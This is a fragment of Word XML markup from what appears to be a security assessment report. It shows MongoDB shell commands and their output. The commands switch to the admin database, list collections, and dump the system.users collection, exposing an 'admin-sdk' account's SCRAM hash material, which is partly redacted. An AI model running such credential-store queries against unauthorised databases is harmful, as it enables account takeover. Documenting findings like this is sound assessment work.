        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2.14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>784.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>336.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>72.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>88.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>DB):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>switched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>collections):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>collections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>details):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.system.users.find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.pretty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_id: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'admin.admin-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>userId: new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>UUID(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"d33bb481[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1115" w:right="6728" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'admin-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>db: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>credentials: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'SCRAM-SHA-1': </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iterationCount: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>salt: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'u8t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>storedKey: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'LuI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>serverKey: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'fgt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'SCRAM-SHA-256': </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
